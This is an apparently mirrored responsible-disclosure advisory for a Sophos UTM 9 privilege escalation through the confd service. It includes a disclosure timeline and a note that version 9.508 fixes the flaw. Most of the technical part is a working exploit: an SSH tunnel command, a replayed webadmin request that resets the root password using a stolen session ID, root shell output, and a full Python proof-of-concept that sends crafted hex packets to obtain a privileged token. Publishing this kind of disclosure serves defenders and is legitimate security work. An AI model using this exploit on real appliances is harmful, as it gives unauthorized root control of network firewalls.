Lucene search
K

Sophos UTM 9 loginuser Privilege Escalation

🗓️ 02 Mar 2018 00:00:00Reported by Matthew BerginType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 52 Views

Sophos UTM 9 loginuser Privilege Escalation via confd Servic

Code
`KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service  
  
Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service  
Advisory ID: KL-001-2018-007  
Publication Date: 2018.03.02  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: UTM 9  
Affected Version: 9.410  
Platform: Embedded Linux  
CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)  
Impact: Privilege Escalation  
Attack vector: SSH  
  
2. Vulnerability Description  
  
The attacker must know the password for the loginuser  
account. The confd client is not available to the loginuser  
account. However, the running service is accessible over  
a network port on the loopback interface. By replaying the  
network traffic required to obtain a SID from this service it  
is possible to escalate privileges to root.  
  
3. Technical Description  
  
1. Obtain the a privileged session token  
  
$ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 [email protected]  
[email protected]'s password:  
$ python kl-loginuser-confd-priv_esc.py  
pojiZSqWEUAUDNIQtSop  
  
2. Using that session token, set the root password  
  
POST /webadmin.plx HTTP/1.1  
Host: 1.3.3.7:4444  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.5.1.1  
Content-Type: application/json; charset=UTF-8  
Referer: https://1.3.3.7:4444/  
Content-Length: 422  
Cookie: SID=pojiZSqWEUAUDNIQtSop  
DNT: 1  
Connection: close  
  
{"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1":  
"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser":  
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":  
"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}  
  
HTTP/1.1 200 OK  
Date: Thu, 23 Mar 2017 15:33:53 GMT  
Server: Apache  
Expires: Thursday, 01-Jan-1970 00:00:01 GMT  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Option: nosniff  
X-XSS-Protection: 1; mode=block  
Vary: Accept-Encoding  
Connection: close  
Content-Type: application/json; charset=utf-8  
Content-Length: 178895  
  
{"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]  
  
3. Look for success message.  
  
"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]  
  
4. Profit.  
  
loginuser@[redacted]:/home/login > su  
Password:  
[redacted]:/home/login # id  
uid=0(root) gid=0(root) groups=0(root),890(xorp)  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has addressed this vulnerability in version  
9.508. Release notes and download instructions can be found at:  
  
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released  
  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic submits vulnerability details to Sophos.  
2017.07.21 - Sophos acknowledges receipt.  
2017.09.01 - 30 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.09.15 - KoreLogic requests an update on the status of this and  
other vulnerabilities reported to Sophos.  
2017.09.18 - Sophos informs KoreLogic that this issue will require  
additional engineering and requests an extension of  
the disclosure timeline.  
2017.09.25 - 45 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.11.07 - 75 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.12.14 - 100 business days have elapsed since the vulnerability  
was reported to Sophos.  
2018.01.12 - KoreLogic requests an update from Sophos.  
2018.01.15 - Sophos informs KoreLogic that the expected release date  
for the UTM 9.5 MR 6 version containing the mitigation  
is the middle of February.  
2018.01.16 - 120 business days have elapsed since the vulnerability  
was reported to Sophos.  
2018.02.28 - 150 business days have elapsed since the vulnerability  
was reported to Sophos.  
2018.03.01 - UTM 9.508 released by Sophos.  
2018.03.02 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
from socket import socket,AF_INET,SOCK_STREAM  
  
class Exploit:  
def __init__(self):  
self.host = '127.0.0.1'  
self.port = 4472  
self.connected = False  
self.s = None  
return None  
def disconnect(self):  
self.s.close()  
return True  
def send_trigger(self):  
packet_one =  
'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')  
self.s.send(packet_one)  
self.s.recv(4096)  
packet_two =  
'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')  
self.s.send(packet_two)  
self.s.recv(4096)  
packet_three =  
'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')  
self.s.send(packet_three)  
print self.s.recv(4096).strip()  
return True  
def connect(self):  
self.s = socket(AF_INET, SOCK_STREAM)  
self.s.connect((self.host,self.port))  
self.connected = True  
return True  
def run(self):  
self.connect()  
self.send_trigger()  
self.disconnect()  
return True  
  
if __name__=="__main__":  
Exploit().run()  
  
  
The contents of this advisory are copyright(c) 2018  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Mar 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
52